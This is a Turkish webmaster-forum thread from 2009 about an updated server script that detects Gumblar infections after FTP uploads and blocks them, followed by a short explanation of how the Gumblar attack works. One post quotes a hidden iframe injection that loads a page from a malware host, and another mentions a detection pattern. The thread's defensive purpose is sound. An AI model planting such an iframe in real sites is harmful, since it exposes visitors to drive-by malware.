İyinet - Webmaster Forumu

Geri Dön   İyinet - Webmaster Forumu > Web Hosting > Hosting Genel > Güvenlik

Güvenlik Güvenlik Korunma - DOS DDOS SYN saldırıları Oturum hızsızlığı tesbit ve korunma

User Tag List

Cevapla
 
LinkBack Seçenekler
  #1 (permalink)  
Alt 14.08.2009, 05:07
hidonet - ait Kullanıcı Resmi (Avatar)
Üye
 
Üyelik tarihi: 19.05.2008
Mesajlar: 37
Standart Anti-Gumblar scripti guncellendi

Cpanel/Pure-FTP/Clamav kullanan Linux sunucular yazdigimiz iframe/javascript/gumblar saldirisi engelleyici script guncellendi. Artik daha yetenekli bir yazılım haline geldi. Pure FTP nin upload sonrasi bu scripti calistirmasi nedeniyle malesef ilk dosyayi kaybediyoruz. Ancak bu bulasmadan sonra;

1 ) Viruslu dosya sizin belirlediginiz karantina dizinine atilir
2 ) Eger clamav bu dosyada virus bulamazsa, gumblar saldirilarinin karakteristik kelimelerinden olusturulan patern ile text ( html, php, asp gibi ) dosyalarda tarama yapilir. ( .cn:808x/tx.cgi... vb.) kelimeler aranir.
3 ) Hesabin sifresi degistirilir
4 ) Viruslu dosyayi upload edenin IP adresi ( CSF, APF gibi firewall uygulamalariyla ) bloklanir.
5 ) Saldiran kisinin o an bosta olan veya faal baglantisi kesilir
6 ) Butun bu islemlerle ilgili bir alarm/bildiri maili belirlediginiz adrese gonderilir

http://www.oxio.net/anti_gumblar/

http://www.oxio.net/anti_gumblar/anti_gumblar.tar.gz

Latest Release - 20090813
Alıntı ile Cevapla
  #2 (permalink)  
Alt 14.08.2009, 07:04
iyinet - ait Kullanıcı Resmi (Avatar)
Paylaşım için teşekkürler
 
Üyelik tarihi: 2.09.2002
Nereden: İzmir
Mesajlar: 5,052
Standart

Elinize sağlık da benim gibi bilmeyenler için gumblar ın ne olduğunu açıklayabilirmisiniz.
__________________
Konu açmadan önce " FORUM KURALLARI " bölümünü gözden geçirin.

Her türlü soru, öneri, memnuniyet, şikayet ve bilgi taleplerinizi iletmek için " MAİL " adresimizi kullanabilir veya " İLETİŞİM FORMU " üzerinden bizlere ulaşabilirsiniz.

Kurallara Uyduğunuz için Teşekkürler !
Alıntı ile Cevapla
  #3 (permalink)  
Alt 14.08.2009, 12:56
hidonet - ait Kullanıcı Resmi (Avatar)
Üye
 
Üyelik tarihi: 19.05.2008
Mesajlar: 37
Standart

sitelerinizin google tarafindan sakincali site olarak gosterilmesine neden olan seyler.

Ilk olarak gumblar.cn adli site ile yayildigi icin bu adi aldi.

FTP sifrelerinizin makinaniza bulasan bi trojan tarafindan calinarak botnet sahibine gonderilmesi ve bu sitelerin dosyalarina

PHP- Kodu:
<iframe src="http://x9e.ru:8080/index.php" width=126 height=156 style="visibility: hidden"></iframe
seklinde kodlarin eklenmesi esasina dayanir. Bu sayede siteniz artik virus dagitan bir site haline gelir ve google tarafindan zararli yazilim dagitan site olarak isaretlenir. Firefox, Chrome ve Opera ile giren butun ziyaretciler ekranda kocaman kirmizi bi yazi gorur.

Sizin karizma da kirmizi kalemle cizilir...

Aslinda hosting firmasi bu isten birinci seviyede sorumlu degildir. Cunku FTP sifresini caldiran musteridir. Ancak hosting firmasi buna tedbir alirsa daha $ukela olur...
Alıntı ile Cevapla
  #4 (permalink)  
Alt 14.08.2009, 17:17
iyinet - ait Kullanıcı Resmi (Avatar)
Paylaşım için teşekkürler
 
Üyelik tarihi: 2.09.2002
Nereden: İzmir
Mesajlar: 5,052
Standart

Anladım, açıklama için teşekkürler.
Peki Kaspersky gibi internet güvenlik araçları bunu henüz tesbit edemiyorlar mı?
__________________
Konu açmadan önce " FORUM KURALLARI " bölümünü gözden geçirin.

Her türlü soru, öneri, memnuniyet, şikayet ve bilgi taleplerinizi iletmek için " MAİL " adresimizi kullanabilir veya " İLETİŞİM FORMU " üzerinden bizlere ulaşabilirsiniz.

Kurallara Uyduğunuz için Teşekkürler !
Alıntı ile Cevapla
  #5 (permalink)  
Alt 15.08.2009, 14:16
osahin - ait Kullanıcı Resmi (Avatar)
Üye
 
Üyelik tarihi: 8.10.2006
Nereden: kalbinizden :p
Yaş: 38
Mesajlar: 2,502
Standart

Ediyorlar ama bu sizinle ilgili bir güvenlik aşaması oluyor, örneğin benim 50 müşterim var kimi zaman kendi sitelerinde ufak değişiklikleri kendileri yapmak istiyor ve onların bilgisayarlarındaki trojanlar müşterilerin ftp' ye bağlanmasından sonra sunucuya geçiyor sonrada müşteri arayıp niye benim sitem böyle oldu diyor :p bu sunucu tabanlı bir koruma bence çok güzel tebrikler
Alıntı ile Cevapla
  #6 (permalink)  
Alt 2.09.2009, 06:37
hidonet - ait Kullanıcı Resmi (Avatar)
Üye
 
Üyelik tarihi: 19.05.2008
Mesajlar: 37
Standart Anti Gumblar Scripti Güncellendi

Release Changelog - 20090902
- ) ftp_clamscan.sh dosyasi artik kaldirildi
- ) Kullanici adi bulma fonksiyonundaki hatalar giderildi
- ) FTP baglantisi kesme ozelligi yenilendi
- ) Ayar ( config ) bolumu ayri dosyaya alindi. ( ftp_clamscan_config.php )
- ) Log dosyasi /var/log/ftp_clamscan.log olarak ( veya siz ne isterseniz o sekilde ) calisabiliyor
- ) Karantina klasoru /quarantine/clamav/ oldu ( veya siz nerede isterseniz orada da olur )
- ) Bazi kucuk fixler yapildi

Detay icin : http://www.oxio.net/anti_gumblar/
Alıntı ile Cevapla
  #7 (permalink)  
Alt 11.09.2009, 21:07
ognn - ait Kullanıcı Resmi (Avatar)
Üye
 
Üyelik tarihi: 11.09.2009
Yaş: 27
Mesajlar: 8
Standart

bende bilmiyordum gumblar olayını eyw
Alıntı ile Cevapla
Cevapla

Bu Konuyu Paylaşın !

Etiketler
antigumblar , guncellendi , scripti


Şu an bu konuyu okuyan kişi sayısı: 1 (0 üye ve 1 misafir)
 
Seçenekler

Yetkileriniz
Konu Acma Yetkiniz Yok
Cevap Yazma Yetkiniz Yok
Eklenti Yükleme Yetkiniz Yok
Mesajınızı Değiştirme Yetkiniz Yok

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodu Kapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık



Forum Saati: 05:53. Zaman dilimi GMT +3 olarak ayarlanmıştır.


Powered by vBulletin™ Version 3.8.7
Copyright © 2018 vBulletin Solutions, Inc. All rights reserved.
Content Relevant URLs by vBSEO

Önemli Bilgi

2002-2018 © İYİNET Lisanslı Bir Markadır Tüm İçerik Hakları Saklıdır ve İzinsiz Kopyalanamaz, Dağıtılamaz.
5651 Sayılı yasaya göre, iyinet webmaster forumunda tüm üyeler yaptıkları paylaşımlardan sorumludur.
Üyelerin mesajlarından doğabilecek sorunlardan forumumuz sorumlu değildir. Şikayetleriniz için Mail aracılığı ile iletişime geçebilirsiniz. Forum Kuralları